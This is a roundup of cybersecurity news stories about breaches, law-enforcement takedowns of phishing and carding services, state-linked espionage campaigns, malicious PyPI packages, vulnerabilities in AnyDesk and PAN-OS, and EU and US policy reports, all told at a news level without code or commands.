Cyberattack Disrupts Systems of Gambling Giant IGT
International Game Technology (IGT), a global gambling and lottery giant, has confirmed a cyberattack that disrupted parts of its IT network. The breach, discovered on November 17, prompted the company to activate its incident response plan and engage external advisors for investigation and mitigation efforts.
“An unauthorized third party gained access to certain systems, resulting in disruptions to portions of internal IT systems and applications,” IGT disclosed in an SEC filing. Proactive measures, including taking certain systems offline, were implemented to safeguard operations.
IGT is yet to determine the material impact of the breach but assures stakeholders that business continuity plans are mitigating disruptions. While the nature of the attack is not specified, ransomware remains a likely culprit given the company’s response.
Headquartered in London, IGT employs over 11,000 individuals globally, specializing in slot machines, lottery technology, and gambling products. The company is coordinating with stakeholders and implementing interim measures to sustain services. Read the full SEC filing here.
US Takes Down Stolen Credit Card Marketplace PopeyeTools
The U.S. Department of Justice (DoJ) announced the takedown of PopeyeTools, a prominent marketplace for trading stolen credit card information, and unsealed charges against three individuals allegedly behind its operations.
PopeyeTools, operational since 2016, facilitated the sale of stolen financial data, including credit and debit card information, to enable fraud. The marketplace reportedly hosted thousands of users worldwide and generated over $1.7 million in revenue. Its offerings included stolen credentials, fraud-enabling tools, and services to verify the validity of illicit data. Authorities seized PopeyeTools’ domains (.com, .co.uk, .to) and $283,000 in cryptocurrency tied to the operation.
Three administrators—Abdul Ghaffar and Abdul Sami from Pakistan and Javed Mirza from Afghanistan—were charged with facilitating the illegal marketplace. This action underscores the ongoing U.S. efforts to dismantle platforms contributing to cybercrime.
For more details, read the DoJ’s official announcement.
Russian Cyberespionage Group Hits 60 Victims in Asia, Europe
A Russian cyberespionage group, TAG-110, linked to state-sponsored actor APT28 (Fancy Bear), has targeted over 60 victims across Asia and Europe, primarily in government, education, and human rights sectors, according to a Recorded Future report.
TAG-110’s malicious activities involve deploying custom malware such as HatVibe and CherrySpy to infiltrate systems and extract sensitive information. Victims span countries like Kazakhstan, India, Mongolia, and Ukraine, with notable targets including state-owned entities and human rights organizations.
The group uses phishing campaigns and exploits vulnerabilities in internet-facing systems to gain access. Recorded Future emphasizes that TAG-110’s activities align with Russia's geopolitical strategies, especially in Central Asia. This highlights the need for robust cybersecurity measures in vulnerable regions.
400,000 Systems Potentially Exposed to 2023’s Most Exploited Flaws
VulnCheck has reported that hundreds of thousands of internet-facing systems remain exposed to the most exploited vulnerabilities of 2023, posing significant risks to organizations worldwide.
The vulnerabilities, identified in widely used products from companies like Microsoft, Citrix, and Cisco, have been exploited by threat actors linked to countries such as China, Russia, and Iran. Many of these flaws were targeted as zero-days or exploited soon after public disclosure. Notably, the infamous Log4Shell vulnerability tops the list with over 100 public exploits.
Approximately 400,000 systems remain exposed, with Fortinet FortiOS appliances accounting for half of the vulnerable systems. VulnCheck emphasizes the need for robust patch management and reduced internet exposure to mitigate risks.
Read VulnCheck’s detailed analysis here.
Microsoft Disrupts ONNX Phishing Service, Names Operator
Microsoft has dismantled the ONNX phishing operation and publicly named its alleged operator, Abanoub Nady, an Egyptian developer who has been linked to several phishing-as-a-service offerings since 2017.
ONNX phishing kits, starting at $150 per month, were used to launch large-scale credential theft campaigns and adversary-in-the-middle (AitM) attacks to bypass multi-factor authentication. Microsoft, with support from the Linux Foundation, seized 240 domains tied to the operation, significantly hampering its activities.
While the disruption is a win, Microsoft warns that other cybercriminals are likely to fill the void. This action highlights the growing need for cross-industry collaboration to combat phishing and cybercrime.
Learn more about Microsoft’s legal action here.
Prompt Security Raises $18 Million for Gen-AI Security Platform
Generative AI security startup Prompt Security announced on Wednesday that it has raised $18 million in a Series A funding round, bringing its total funding to $23 million. The round was led by Jump Capital with participation from Hetz Ventures, Ridge Ventures, Okta, and F5.
Based in Tel Aviv, Israel, Prompt Security came out of stealth in January to address a growing concern: securing generative AI tools and preventing sensitive data exposure. The platform secures enterprise AI usage across browsers, copilots, coding assistants, and custom applications.
Prompt Security’s technology identifies and mitigates AI-specific threats, including jailbreaks, prompt injections, and shadow AI. According to the company, an average organization uses over 60 generative AI tools, with 39% of those being trained on internal enterprise data—potentially leading to significant compliance and security risks.
“Enterprises are accelerating their adoption of GenAI, but with it comes an explosion of risks,” said CEO Itamar Golan. “This funding supercharges our mission to secure GenAI deployments and enable safe AI innovation.”
Thai Court Dismisses Activist’s Pegasus Spyware Case Due to Lack of Evidence
A Thai court dismissed a lawsuit on Thursday filed by pro-democracy activist Jatupat Boonpattararaksa against NSO Group, the Israeli spyware producer known for its Pegasus software. Jatupat alleged his phone had been hacked using Pegasus during Thailand’s 2021 protests.
The court ruled the activist had insufficient evidence to prove his claims, despite investigations by watchdog groups like Citizen Lab confirming Pegasus attacks in Thailand. According to DigitalReach, over 35 activists were targeted between 2020 and 2021.
NSO Group stated it licenses Pegasus only to government agencies for lawful surveillance. However, activists argue the spyware is misused to suppress dissent. Amnesty International called the ruling "alarming" but reaffirmed its commitment to fighting unlawful spyware usage worldwide.
Read: Apple Suddenly Drops NSO Group Spyware Lawsuit
Russian Hackers Deploy HATVIBE and CHERRYSPY Malware Across Europe and Asia
Russian cyber espionage group TAG-110 has been linked to malware campaigns targeting government entities and research institutions in Central Asia, East Asia, and Europe, according to Recorded Future.
Using tools like HATVIBE and CHERRYSPY, the attackers exploit public-facing vulnerabilities and phishing schemes to exfiltrate data. First documented by CERT-UA in May 2023, these malware families have been used against 62 victims in countries such as Tajikistan, Kyrgyzstan, and Hungary.
TAG-110’s operations align with Russia’s broader geopolitical objectives, particularly following its invasion of Ukraine. Cybersecurity experts anticipate that Russia will escalate sabotage operations targeting NATO allies and critical infrastructure while adhering to hybrid warfare tactics outlined in the Gerasimov Doctrine.
APT-K-47 Uses Hajj-Themed Lures to Deploy Asyncshell Malware
Threat actor Mysterious Elephant, also referred to as APT-K-47, has been deploying a sophisticated version of Asyncshell malware using phishing lures themed around the Hajj, according to the Knownsec 404 Team.
The attack chain involves a CHM file disguised as an official Hajj policy document, tricking victims into executing malicious payloads. The malware uses evolving tactics, such as leveraging vulnerabilities like CVE-2023-38831 and switching to HTTPS for command-and-control communication.
APT-K-47 primarily targets Pakistani organizations and shares operational similarities with groups like SideWinder and Bitter. Researchers warn the group’s malware strategy highlights a persistent threat to South Asian nations’ cybersecurity.
China-Linked TAG-112 Targets Tibetan Media with Cobalt Strike Espionage Campaign
A China-linked nation-state group known as TAG-112 has been linked to a cyber espionage campaign targeting Tibetan media and university websites. The attack facilitated the delivery of the Cobalt Strike post-exploitation toolkit, often used by cybercriminals for data collection and further system breaches.
The attackers exploited vulnerabilities in Joomla-based content management systems, embedding malicious JavaScript to prompt users to download a disguised security certificate. This file, in reality, sideloaded a Cobalt Strike Beacon payload.
According to Recorded Future's Insikt Group, TAG-112 appears to be a subgroup of Evasive Panda (also known as Bronze Highland and StormBamboo). While TAG-112 uses simpler tactics, such as unencrypted JavaScript and off-the-shelf malware, both groups share a historical focus on targeting Tibetan organizations like Tibet Post and Gyudmed Tantric University.
The operation underscores China's continued focus on cyber espionage against Tibetan entities. Read more from Recorded Future.
Microsoft, Meta, and DOJ Disrupt Global Cybercrime and Fraudulent Networks
Microsoft, Meta Platforms, and the U.S. Department of Justice (DoJ) have launched independent actions to dismantle major cybercrime networks, targeting phishing operations and online fraud marketplaces.
Microsoft’s Digital Crimes Unit (DCU) seized 240 fraudulent websites linked to Egypt-based Abanoub Nady, operator of the phishing-as-a-service (PhaaS) platform ONNX. These phishing kits, sold for $150–$550, helped criminals bypass two-factor authentication (2FA) and gain access to sensitive accounts, including financial institutions. Read the full details from Microsoft.
Simultaneously, the DoJ shut down PopeyeTools, a marketplace for stolen credit card data, arresting three administrators linked to operations that reportedly earned $1.7 million since 2016. The marketplace advertised illegal tools and sensitive personal data, further exacerbating financial fraud globally. Details can be found at the DoJ website.
Meta also cracked down on pig butchering scams, dismantling accounts associated with organized crime syndicates in Southeast Asia. These scams use social media and dating apps to lure victims into fake investments. Meta continues to collaborate with partners like Coinbase and Ripple under the Tech Against Scams initiative. Learn more from Meta's newsroom.
PyPI Attack: ChatGPT, Claude Impersonators Deliver JarkaStealer via Python Libraries
Researchers have uncovered two malicious packages on the Python Package Index (PyPI) repository impersonating OpenAI’s ChatGPT and Anthropic’s Claude AI. The packages, gptplus and claudeai-eng, were designed to deliver JarkaStealer, an information-stealing malware.
Uploaded in late 2023, the libraries disguised malicious code within their __init__.py
files, downloading a Java archive from GitHub and a Java Runtime Environment from Dropbox. Once executed, JarkaStealer harvested sensitive information, including browser data, screenshots, and session tokens from apps like Telegram and Discord.
The malware was marketed as malware-as-a-service (MaaS) on Telegram, available for $20–$50, although its source code was leaked on GitHub. Kaspersky researchers emphasize the importance of vigilance when using open-source software. Learn more from Kaspersky.
These incidents highlight the risks of supply chain attacks in software development, reinforcing the need for robust cybersecurity practices.
Chinese Hackers Preparing for Conflict, Says U.S. Cyber Official
Chinese hackers are embedding themselves in critical U.S. infrastructure networks to prepare for potential conflict with the United States, warned Morgan Adamski, executive director of U.S. Cyber Command, on Friday at the Cyberwarcon conference in Arlington, Virginia.
Adamski emphasized that Chinese cyber operations are strategically designed to give Beijing an upper hand in case of a military or political confrontation. Earlier this year, U.S. officials revealed evidence of Chinese-linked hackers compromising key IT networks, including systems crucial for energy and water infrastructure. This could allow for disruptive attacks such as manipulating HVAC systems in data centers or interrupting vital utility services.
One notable operation, dubbed “Salt Typhoon,” involved hackers targeting U.S. telecommunications firms, stealing sensitive data such as call records and communications of high-profile individuals, including campaign officials for the 2024 U.S. presidential elections. The FBI labeled it the worst telecom hack in U.S. history.
In response, the U.S. government has ramped up global defensive and offensive cybersecurity efforts, ranging from exposing Chinese operations to sanctions and cybersecurity advisories. Beijing, however, denies any involvement in cyber operations targeting the United States.
For more details, read the Reuters report.
Critical AnyDesk Vulnerability Exposes Users’ IP Addresses
A newly discovered critical vulnerability in AnyDesk, the popular remote desktop application, could expose users’ IP addresses, creating a significant privacy and security risk.
Identified as CVE-2024-52940, the flaw affects AnyDesk versions 8.1.0 and earlier on Windows systems. Discovered by security researcher Ebrahim Shafiei, the vulnerability leverages the “Allow Direct Connections” feature. Attackers can retrieve a user’s public IP address using only their AnyDesk ID, without any changes to the target system’s configuration.
The vulnerability also risks revealing private IP addresses on local networks, making it a serious concern for users. The National Institute of Standards and Technology (NIST) has assigned this flaw a CVSS base score of 7.5, indicating high severity.
What Users Can Do
While AnyDesk has yet to release a patch, users are urged to:
- Disable the “Allow Direct Connections” feature.
- Use VPN services to mask their IP addresses.
- Monitor for suspicious activity and keep AnyDesk updated.
This vulnerability serves as a wake-up call for developers and users alike to prioritize security in remote desktop applications. For a technical breakdown, visit Tenable’s CVE details.
EU Governments Push for Enhanced Resources for Cyber Agency ENISA
National governments are urging the European Commission to bolster the EU’s cybersecurity agency, ENISA, by increasing financial and human resources. This push comes ahead of the Cybersecurity Act review, which provides an opportunity to expand ENISA’s capabilities.
ENISA, headquartered in Athens, plays a critical role in implementing EU-wide cybersecurity regulations, including NIS 2, the Cyber Resilience Act, and the Cyber Solidarity Act. However, its responsibilities have outgrown its current resources. Governments are calling for a clearer and more focused mandate for ENISA to effectively support national governments and enhance the trustworthiness of ICT products through certification.
Key debates include the controversial EU Cloud Certification Scheme (EUCS), which remains unresolved. Incoming EU Tech Commissioner Henna Virkkunen is tasked with advancing cybersecurity adoption and certification processes.
Telecom ministers are expected to approve these recommendations in early December. For deeper insights, visit the full coverage on Euronews.
Palo Alto Networks Pushes Back as Shadowserver Spots 2K of Its Firewalls Exploited
A dispute has emerged between Shadowserver and Palo Alto Networks over the scale of compromised instances involving the PAN-OS operating system. Shadowserver’s scans identified approximately 2,000 firewalls compromised by a zero-day vulnerability. However, Palo Alto Networks countered these findings, stating the number of affected instances is significantly lower.
The Controversy
Shadowserver, a nonprofit focused on internet security monitoring, detected artifacts indicating compromise in around 2,000 instances. Palo Alto Networks’ Steven Thai, Senior Manager of Global Crisis Communications, dismissed these numbers, emphasizing that less than half a percent of their firewalls have an internet-exposed management interface.
The vulnerability in question, CVE-2024-0012, is an authentication bypass flaw patched earlier this week. Shadowserver CEO Piotr Kijewski reported that attackers have increasingly targeted this flaw alongside another critical PAN-OS vulnerability, CVE-2024-9474, as observed in scans starting Tuesday.
Palo Alto’s threat intelligence arm, Unit 42, has labeled this exploitation campaign as “Operation Lunar Peek” and is actively working to mitigate impacts. Despite Shadowserver’s findings, Palo Alto remains firm that its swift actions and advisories have minimized risks for its customers.
For more on this story, read the official advisory from Palo Alto Networks here and Shadowserver's ongoing research updates here.
GAO Warns of Quantum Threat to U.S. Cybersecurity Amid Leadership and Strategy Gaps
The Government Accountability Office (GAO) released a report highlighting the cybersecurity risks posed by quantum computing and the lack of a comprehensive U.S. strategy to address these threats. The report warns that leadership voids and insufficient funding could leave critical infrastructure sectors vulnerable as the nation transitions to post-quantum cryptography (PQC).
The Quantum Threat
Quantum computers, once powerful enough, could undermine current cryptographic defenses, potentially decrypting sensitive government and corporate data. The timeline for the emergence of a cryptographically relevant quantum computer (CRQC) is estimated at 10 to 20 years, but adversaries could already be storing encrypted data to exploit once these systems become viable—a strategy known as "harvest now, decrypt later."
The GAO report underscores the urgency of transitioning federal systems to quantum-safe methods, warning that a failure to act now could expose the U.S. to significant risks.
Current Strategy and Gaps
The U.S. has taken initial steps toward quantum readiness, including the National Institute of Standards and Technology (NIST) working on PQC standards and federal agencies planning migrations. However, critical infrastructure sectors, such as finance and energy, lack clear guidance and support for the transition. Moreover, the absence of measurable goals and milestones hampers progress.
The GAO identified the Office of the National Cyber Director (ONCD) as the best entity to lead the national strategy but noted that the office has yet to fully embrace this role. Without a central authority, efforts remain fragmented, increasing the risk of delays and vulnerabilities.
International and Industry Efforts
Globally, countries like those in the European Union and organizations such as NATO are advancing quantum-safe initiatives, often using hybrid cryptographic solutions to bridge the transition. Tech giants, including Google, Apple, and Amazon, have also begun integrating hybrid cryptography into their systems.
The GAO report criticized the U.S. strategy for not aligning with these international efforts, leaving gaps that adversaries could exploit.
Recommendations and Next Steps
The report calls for the ONCD to take charge by coordinating efforts across federal agencies, private sectors, and international partners. It also recommends more robust funding plans, better accountability frameworks, and incentives for private industries to offset the high costs of upgrading legacy systems.
Despite these challenges, the GAO remains optimistic that the 10- to 20-year timeline provides a window of opportunity for preparation—if decisive actions are taken immediately.
For more details, read the GAO’s full report on quantum cybersecurity here and explore NIST's PQC standards development updates here.